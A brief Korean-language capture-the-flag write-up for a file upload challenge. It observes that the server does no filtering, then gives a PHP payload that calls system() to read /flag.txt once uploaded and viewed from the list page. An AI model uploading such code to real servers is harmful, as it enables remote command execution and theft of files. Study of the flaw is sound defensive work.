Source Code

• 필터링에 대한 부분이 하나도 없다.
  • 즉, php, html등 업로드하여 실행할 수 있다.

Get Flag!

• flag.txt의 경로는 문제에서 제시하였다.
• 우리는 php를 업로드하여 처리하게 할 수 있다.

<?php
  system("cat /flag.txt");
?>

• 해당 파일을 업로드한 후, list 페이지에서 확인하면 얻을 수 있다.